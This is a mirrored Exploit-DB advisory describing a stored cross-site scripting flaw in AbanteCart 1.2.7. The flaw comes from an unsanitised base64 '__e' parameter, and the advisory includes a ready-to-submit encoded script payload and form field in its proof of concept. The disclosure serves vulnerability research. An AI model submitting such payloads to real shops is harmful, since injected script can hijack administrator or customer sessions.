bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/40877.md
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

838 B
Raw Blame History

Exploit Title: AbanteCart 1.2.7 Stored XSS

Date: 06-12-2016

Software Link: http://www.abantecart.com/

Exploit Author: Kacper Szurek

Contact: http://twitter.com/KacperSzurek

Website: http://security.szurek.pl/

Category: webapps

  1. Description

By default all user input is escaped using htmlspecialchars.

But we can pass __e value which is base64 encoded and unfortunatelly those datas are not cleaned.

http://security.szurek.pl/abantecart-127-stored-xss-and-sql-injection.html

  1. Proof of Concept

For example address_1="><script>alert(2);</script>& can be encoded as: __e=YWRkcmVzc18xPSI+PHNjcmlwdD5hbGVydCgyKTs8L3NjcmlwdD4m.

So create new order and set address_1 value as __e using for example Burp:

Content-Disposition: form-data; name="__e"

YWRkcmVzc18xPSI+PHNjcmlwdD5hbGVydCgyKTs8L3NjcmlwdD4m